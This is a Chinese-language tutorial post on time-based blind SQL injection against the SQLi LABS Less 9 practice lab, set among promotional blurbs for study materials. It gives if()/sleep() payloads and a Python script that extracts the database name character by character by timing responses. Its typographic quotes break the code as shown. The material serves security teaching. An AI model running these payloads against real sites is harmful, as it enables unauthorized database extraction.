一、网安学习成长路线图
网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网安视频合集
观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
三、精品网安学习书籍
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
四、网络安全源码合集+工具包
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
五、网络安全面试题
最后就是大家最关心的网络安全面试题板块
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
?id=1’ and if((ascii(substr(查询语句,1,1)) =1), sleep(5), 3) – a
如果页面响应时间超过5秒,说明字符内容判断正确;
如果页面响应时间不超过5秒(正常响应),说明字符内容判断错误,递增猜解该字符的其他可能性。
第一个字符猜解成功后,依次猜解第二个、第三个……第n个(n表示返回结果的长度)。
## 四、时间盲注的弊端
1. 时间盲注的时间复杂度较高,需要消耗大量的时间。
2. 时间盲注容易受到网络波动等因素的影响,从而产生误差。
时间盲注误差大、时间成本高,通常情况下,能够证明注入存在就可以了。
## 五、盲注脚本
时间盲注通常会使用脚本自动化猜解,Python脚本如下,可按需修改:
import requests
import time
将url 替换成你的靶场关卡网址
修改两个对应的payload
目标网址(不带参数)
url = “http://0f3687d08b574476ba96442b3ec2c120.app.mituan.zone/Less-9/”
猜解长度使用的payload
payload_len = “”“?id=1’ and if(
(length(database()) ={n})
,sleep(5),3) – a”“”
枚举字符使用的payload
payload_str = “”“?id=1’ and if(
(ascii(
substr(
(database())
,{n},1)
) ={r})
, sleep(5), 3) – a”“”
获取长度
def getLength(url, payload):
length = 1 # 初始测试长度为1
while True:
start_time = time.time()
response = requests.get(url= url+payload_len.format(n= length))
# 页面响应时间 = 结束执行的时间 - 开始执行的时间
use_time = time.time() - start_time
# 响应时间>5秒时,表示猜解成功
if use_time > 5:
print(‘测试长度完成,长度为:’, length,)
return length;
else:
print(‘正在测试长度:’,length)
length += 1 # 测试长度递增
获取字符
def getStr(url, payload, length):
str = ‘’ # 初始表名/库名为空
# 第一层循环,截取每一个字符
for l in range(1, length+1):
# 第二层循环,枚举截取字符的每一种可能性
for n in range(33, 126):
start_time = time.time()
response = requests.get(url= url+payload_str.format(n= l, r= n))
# 页面响应时间 = 结束执行的时间 - 开始执行的时间
use_time = time.time() - start_time
# 页面中出现此内容则表示成功
if use_time > 5:
str+= chr(n)
print(‘第’, l, ‘个字符猜解成功:’, str)
break;
return str;
开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)
## 六、实战思路
试验靶场:SQLi LABS Less 9
注入情况:单引号字符型注入
### 1. 判断是否存在时间盲注
确定注入点以后,需要判断网页是否存在时间盲注,同时满足以下两种情况时,可以确定存在时间盲注:
?id=1’ and if(1, sleep(5), 3) – a 延时5秒响应
?id=1’ and if(0,sleep(5),3) – a 正常响应
#### 原理分析
if() 函数的第一个参数是条件表达式,1会转换为 True,0会转换为 False。
条件表达式结果为 True 时,会执行第二个参数位置的代码,即 sleep(5),延时5秒响应;
条件表达式结果为 False 时,会执行第三个参数位置的代码,即 3,自定义的占位符,无实际意义,页面正常响应。
### 2. 脱库
确定时间盲注存在以后,就可以进行脱库了。
脱库分为两个步骤:判断长度、枚举字符
#### 2.1 判断返回结果的长度
我们以判断当前使用的数据库名的长度来举例,首先判断长度是否大于1。
?id=1’ and if(
(length(database()) >1)
,sleep(5),3) – a
##### 原理分析
payload拼接到SQL中,执行过程如下:
库名的长度肯定大于1,如果页面响应时间大于5秒,说明payload可用,开始从1开始测试长度,依次递增:
#### 2.2 枚举字符
库名可用的字符有95个,比如大小写字母、数字、下划线等特殊字符。
我们截取第一个字符,穷举这95种可能性即可,为了方便猜解,我们将字符转换为ASCLL码再进行判断(字符对应的ASCLL为 32~126)。
先判断当前使用的数据库名 第一个字符的ASCLL码是否大于1:
?id=1’ and if(
(ascii(
substr(
(database())
,1,1)
) >1)
, sleep(5), 3) – a
##### 原理分析
payload拼接到SQL中,执行过程如下:
第一个字符的ASCLL码肯定大于1,页面响应5秒以上,说明payload可用,。
依次判断32到126,页面响应5秒以上说明猜解正确;页面正常响应说明猜解错误。
猜解成功第一个字符后,再依次猜解第二、第三……第n个字符(n表示返回结果的长度)。
## 七、误差判断
同样的payload,如果第一次响应时间很长,但第二次响应时间很短,就说明是受到了网络波动的影响。如果两次响应时间都很长,则说明延时成功。
### 给大家的福利
**零基础入门**
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
517
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
